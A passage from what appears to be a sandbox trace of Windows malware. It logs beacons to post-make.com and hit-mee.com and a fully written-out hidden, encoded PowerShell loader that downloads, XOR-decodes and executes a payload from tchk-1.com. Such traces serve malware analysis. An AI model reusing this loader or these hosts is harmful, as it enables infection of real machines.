lpFile="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\5ZJNWs5LVhHy2g2\\svchost.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=5) returned 0x2a [0069.998] DeleteFileA (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\lAJV5KG3SOUZTZl.KdD3" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\lajv5kg3souztzl.kdd3")) returned 0 [0069.999] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a57490 | out: hHeap=0x530000) returned 1 [0069.999] GetLastError () returned 0x2 [0070.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56a158 | out: hHeap=0x530000) returned 1 [0070.000] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x56d7f0 | out: hHeap=0x530000) returned 1 [0070.000] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x2a2ff28 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x5607c0 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x565190 [0070.001] GetProcessHeap () returned 0x530000 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x2ab73c0 [0070.001] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ab73c0 | out: hHeap=0x530000) returned 1 [0070.001] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x565190 | out: hHeap=0x530000) returned 1 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x5608c8 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x5609d0 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x49) returned 0x570828 [0070.001] GetProcessHeap () returned 0x530000 [0070.001] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x2ab73c0 [0070.002] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2ab73c0 | out: hHeap=0x530000) returned 1 [0070.002] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x570828 | out: hHeap=0x530000) returned 1 [0070.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x92) returned 0x2a656f8 [0070.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1c) returned 0x582f00 [0070.002] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x48) returned 0x2a8d668 [0070.002] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2a9ddb8 [0070.003] WinHttpSetTimeouts (hInternet=0x2a9ddb8, nResolveTimeout=180000, nConnectTimeout=180000, nSendTimeout=180000, nReceiveTimeout=180000) returned 1 [0070.003] WinHttpConnect (hSession=0x2a9ddb8, pswzServerName="post-make.com", nServerPort=0x50, dwReserved=0x0) returned 0x2a9dea0 [0070.004] WinHttpOpenRequest (hConnect=0x2a9dea0, pwszVerb="GET", pwszObjectName="c4fel7k.php?cnv_id=false&payout=0,3", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x58e780 [0070.004] WinHttpSendRequest (hRequest=0x58e780, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0070.245] WinHttpReceiveResponse (hRequest=0x58e780, lpReserved=0x0) returned 1 [0070.584] WinHttpQueryDataAvailable (in: hRequest=0x58e780, lpdwNumberOfBytesAvailable=0x40f98c | out: lpdwNumberOfBytesAvailable=0x40f98c*=0x0) returned 1 [0070.584] WinHttpCloseHandle (hInternet=0x2a9ddb8) returned 1 [0070.584] WinHttpCloseHandle (hInternet=0x2a9dea0) returned 1 [0070.584] WinHttpCloseHandle (hInternet=0x58e780) returned 1 [0070.585] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5607c0 | out: hHeap=0x530000) returned 1 [0070.585] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5608c8 | out: hHeap=0x530000) returned 1 [0070.586] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5609d0 | out: hHeap=0x530000) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x400) returned 0x2a5b1e0 [0070.586] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x400) returned 0x2a809b0 [0070.586] wsprintfA (in: param_1=0x2a809b0, param_2="Windows %d.%d.%d" | out: param_1="Windows 6.1.7601") returned 16 [0070.586] lstrlenA (lpString="Windows 6.1.7601") returned 16 [0070.586] lstrcpyA (in: lpString1=0x2a5b1e0, lpString2="Windows 6.1.7601" | out: lpString1="Windows 6.1.7601") returned="Windows 6.1.7601" [0070.586] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a809b0 | out: hHeap=0x530000) returned 1 [0070.586] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x5609d0 [0070.586] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xd) returned 0x55d220 [0070.586] GetProcessHeap () returned 0x530000 [0070.587] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x2a809b0 [0070.587] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a809b0 | out: hHeap=0x530000) returned 1 [0070.587] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d220 | out: hHeap=0x530000) returned 1 [0070.587] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xff) returned 0x5608c8 [0070.587] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x49) returned 0x2a8b080 [0070.587] GetProcessHeap () returned 0x530000 [0070.587] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x2a809b0 [0070.588] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a809b0 | out: hHeap=0x530000) returned 1 [0070.588] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a8b080 | out: hHeap=0x530000) returned 1 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x28) returned 0x31f5940 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x55d220 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f86b8 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f86a0 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8718 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6a538 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f86d0 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f86e8 [0070.588] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6a4f8 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8760 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8730 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8748 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8508 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6a578 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8610 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f84f0 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6acf8 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f84d8 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f87c0 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6ac98 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8778 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8790 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x10) returned 0x31f8808 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f87d8 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f87f0 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x4) returned 0x2a2fef8 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6ac38 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f87a8 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0xc) returned 0x31f8700 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x201) returned 0x569560 [0070.589] lstrlenA (lpString="{\"windows_version\":\"Windows 6.1.7601\",\"status_code\":1,\"file_statuses\":[{\"file_number\":1,\"status_code\":4,\"last_win_error\":2}]}") returned 125 [0070.589] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x7e) returned 0x58ae88 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x569560 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f87f0 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8748 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6a538 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6a4f8 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6a578 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6acf8 | out: hHeap=0x530000) returned 1 [0070.590] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6ac98 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8808 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a6ac38 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f86e8 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8730 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8700 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f86a0 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8718 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x55d220 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f86d0 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8760 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8610 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f84d8 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8778 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f87d8 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f87a8 | out: hHeap=0x530000) returned 1 [0070.591] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f86b8 | out: hHeap=0x530000) returned 1 [0070.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f5940 | out: hHeap=0x530000) returned 1 [0070.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f84f0 | out: hHeap=0x530000) returned 1 [0070.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f87c0 | out: hHeap=0x530000) returned 1 [0070.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8790 | out: hHeap=0x530000) returned 1 [0070.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x31f8508 | out: hHeap=0x530000) returned 1 [0070.592] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a2fef8 | out: hHeap=0x530000) returned 1 [0070.592] GetProcessHeap () returned 0x530000 [0070.592] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x408) returned 0x2a809b0 [0070.599] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a809b0 | out: hHeap=0x530000) returned 1 [0070.599] GetProcessHeap () returned 0x530000 [0070.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xa9) returned 0x2a3af90 [0070.599] lstrlenA (lpString="xHcSQvtDWfg7Lo8l8eYy3pZtCzb3L7/4idM3JVPG9e0wMiD78YsW7Sk4XUBD8rjhpyarGlDPA5nQvvKu/XrXs4maE/0gZ1bse/S6Y06LQLQiQLmGc72ptQxm807asUuEm7UYAj4RmaObEW4f36oGXtALJ9jk1EPYMkNzCKQ=") returned 168 [0070.599] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x1a7) returned 0x2a17d00 [0070.599] GetLastError () returned 0x0 [0070.599] SetLastError (dwErrCode=0x0) [0070.599] GetLastError () returned 0x0 [0070.599] SetLastError (dwErrCode=0x0) [0070.599] GetLastError () returned 0x0 [0070.599] SetLastError (dwErrCode=0x0) [0070.599] GetLastError () returned 0x0 [0070.599] SetLastError (dwErrCode=0x0) [0070.600] GetLastError () returned 0x0 [0070.600] SetLastError (dwErrCode=0x0) [0070.600] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a17d00 | out: hHeap=0x530000) returned 1 [0070.600] GetProcessHeap () returned 0x530000 [0070.601] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a3af90 | out: hHeap=0x530000) returned 1 [0070.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x92) returned 0x2a65b58 [0070.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x18) returned 0x2a6ac38 [0070.601] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x17e) returned 0x31e8b28 [0070.601] WinHttpOpen (pszAgentW="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.1", dwAccessType=0x0, pszProxyW=0x0, pszProxyBypassW=0x0, dwFlags=0x0) returned 0x2a9ddb8 [0070.602] WinHttpSetTimeouts (hInternet=0x2a9ddb8, nResolveTimeout=180000, nConnectTimeout=180000, nSendTimeout=180000, nReceiveTimeout=180000) returned 1 [0070.602] WinHttpConnect (hSession=0x2a9ddb8, pswzServerName="hit-mee.com", nServerPort=0x50, dwReserved=0x0) returned 0x2a9dea0 [0070.602] WinHttpOpenRequest (hConnect=0x2a9dea0, pwszVerb="GET", pwszObjectName="gate2.php?a=xHcSQvtDWfg7Lo8l8eYy3pZtCzb3L7%2F4idM3JVPG9e0wMiD78YsW7Sk4XUBD8rjhpyarGlDPA5nQvvKu%2FXrXs4maE%2F0gZ1bse%2FS6Y06LQLQiQLmGc72ptQxm807asUuEm7UYAj4RmaObEW4f36oGXtALJ9jk1EPYMkNzCKQ%3D", pwszVersion=0x0, pwszReferrer=0x0, ppwszAcceptTypes=0x0, dwFlags=0x0) returned 0x2ab1a38 [0070.602] WinHttpSendRequest (hRequest=0x2ab1a38, lpszHeaders=0x0, dwHeadersLength=0x0, lpOptional=0x0*, dwOptionalLength=0x0, dwTotalLength=0x0, dwContext=0x0) returned 1 [0075.112] WinHttpReceiveResponse (hRequest=0x2ab1a38, lpReserved=0x0) returned 1 [0075.112] WinHttpQueryDataAvailable (in: hRequest=0x2ab1a38, lpdwNumberOfBytesAvailable=0x40f954 | out: lpdwNumberOfBytesAvailable=0x40f954*=0x0) returned 1 [0075.112] WinHttpCloseHandle (hInternet=0x2a9ddb8) returned 1 [0075.112] WinHttpCloseHandle (hInternet=0x2a9dea0) returned 1 [0075.112] WinHttpCloseHandle (hInternet=0x2ab1a38) returned 1 [0075.116] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x58ae88 | out: hHeap=0x530000) returned 1 [0075.117] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5609d0 | out: hHeap=0x530000) returned 1 [0075.117] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5608c8 | out: hHeap=0x530000) returned 1 [0075.118] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a5b1e0 | out: hHeap=0x530000) returned 1 [0075.118] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544808 | out: hHeap=0x530000) returned 1 [0075.118] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x2a2ff28 | out: hHeap=0x530000) returned 1 [0075.118] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x552138 | out: hHeap=0x530000) returned 1 [0075.118] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x39f) returned 0x2a5b1e0 [0075.118] lstrlenA (lpString="cG93ZXJzaGVsbCAtd2luZG93c3R5bGUgaGlkZGVuIC1lIEpBQjNBRDBBYmdCbEFIY0FMUUJ2QUdJQWFnQmxBR01BZEFBZ0FGTUFlUUJ6QUhRQVpRQnRBQzRBVGdCbEFIUUFMZ0JYQUdVQVlnQmpBR3dBYVFCbEFHNEFkQUE3QUNRQVlnQnpBRDBBSkFCM0FDNEFSQUJ2QUhjQWJnQnNBRzhBWVFCa0FGTUFkQUJ5QUdrQWJnQm5BQ2dBSWdCb0FIUUFkQUJ3QURvQUx3QXZBSFFBWXdCb0FHc0FMUUF4QUM0QVl3QnZBRzBBTHdCa0FISUFid0J3QURJQUxnQmlBSE1BTmdBMEFDSUFLUUE3QUZzQVFnQjVBSFFBWlFCYkFGMEFYUUFnQUNRQWVBQTlBRnNBUXdCdkFHNEFkZ0JsQUhJQWRBQmRBRG9BT2dCR0FISUFid0J0QUVJQVlRQnpBR1VBTmdBMEFGTUFkQUJ5QUdrQWJnQm5BQ2dBSkFCaUFITUFMZ0JTQUdVQWNBQnNBR0VBWXdCbEFDZ0FJZ0FoQUNJQUxBQWlBRUVBSWdBcEFDNEFVZ0JsQUhBQWJBQmhBR01BWlFBb0FDSUFRQUFpQUN3QUlnQlhBQ0lBS1FBdUFGSUFaUUJ3QUd3QVlRQmpBR1VBS0FBaUFDUUFJZ0FzQUNJQWVBQWlBQ2tBTGdCU0FHVUFjQUJzQUdFQVl3QmxBQ2dBSWdBbEFDSUFMQUFpQUhrQUlnQXBBQzRBVWdCbEFIQUFiQUJoQUdNQVpRQW9BQ0lBWGdBaUFDd0FJZ0I2QUNJQUtRQXBBRHNBWmdCdkFISUFLQUFrQUdrQVBRQXdBRHNBSkFCcEFDQUFMUUJzQUhRQUlBQWtBSGdBTGdCREFHOEFkUUJ1QUhRQU93QWtBR2tBS3dBckFDa0Fld0FrQUhnQVd3QWtBR2tBWFFBOUFDQUFLQUFrQUhnQVd3QWtBR2tBWFFBZ0FDMEFZZ0I0QUc4QWNnQWdBRElBTlFBMUFDa0FJQUF0QUdJQWVBQnZBSElBSUFBeEFERUFmUUE3QUdrQVpRQjRBQ2dBV3dCVEFIa0Fjd0IwQUdVQWJRQXVBRlFBWlFCNEFIUUFMZ0JGQUc0QVl3QnZBR1FBYVFCdUFHY0FYUUE2QURvQVZRQlVBRVlBT0FBdUFFY0FaUUIwQUZNQWRBQnlBR2tBYmdCbkFDZ0FKQUI0QUNrQUtRQT0=") returned 1236 [0075.118] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x0, Size=0x400) returned 0x2a809b0 [0075.118] lstrcpyA (in: lpString1=0x2a809b0, lpString2="powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAHQAYwBoAGsALQAxAC4AYwBvAG0ALwBkAHIAbwBwADIALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBXACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAeAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHkAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB6ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADIANQA1ACkAIAAtAGIAeABvAHIAIAAxADEAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=" | out: lpString1="powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAHQAYwBoAGsALQAxAC4AYwBvAG0ALwBkAHIAbwBwADIALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBXACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAeAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHkAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB6ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADIANQA1ACkAIAAtAGIAeABvAHIAIAAxADEAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=") returned="powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAHQAYwBoAGsALQAxAC4AYwBvAG0ALwBkAHIAbwBwADIALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBXACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAeAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHkAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB6ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADIANQA1ACkAIAAtAGIAeABvAHIAIAAxADEAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=" [0075.118] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="powershell -windowstyle hidden -e JAB3AD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBjAGwAaQBlAG4AdAA7ACQAYgBzAD0AJAB3AC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAIgBoAHQAdABwADoALwAvAHQAYwBoAGsALQAxAC4AYwBvAG0ALwBkAHIAbwBwADIALgBiAHMANgA0ACIAKQA7AFsAQgB5AHQAZQBbAF0AXQAgACQAeAA9AFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABiAHMALgBSAGUAcABsAGEAYwBlACgAIgAhACIALAAiAEEAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAQAAiACwAIgBXACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACQAIgAsACIAeAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAlACIALAAiAHkAIgApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIgB6ACIAKQApADsAZgBvAHIAKAAkAGkAPQAwADsAJABpACAALQBsAHQAIAAkAHgALgBDAG8AdQBuAHQAOwAkAGkAKwArACkAewAkAHgAWwAkAGkAXQA9ACAAKAAkAHgAWwAkAGkAXQAgAC0AYgB4AG8AcgAgADIANQA1ACkAIAAtAGIAeABvAHIAIAAxADEAfQA7AGkAZQB4ACgAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAB4ACkAKQA=", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x40f9a8*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x40f9f0 | out: lpCommandLine="powershell -windowstyle hidden -e 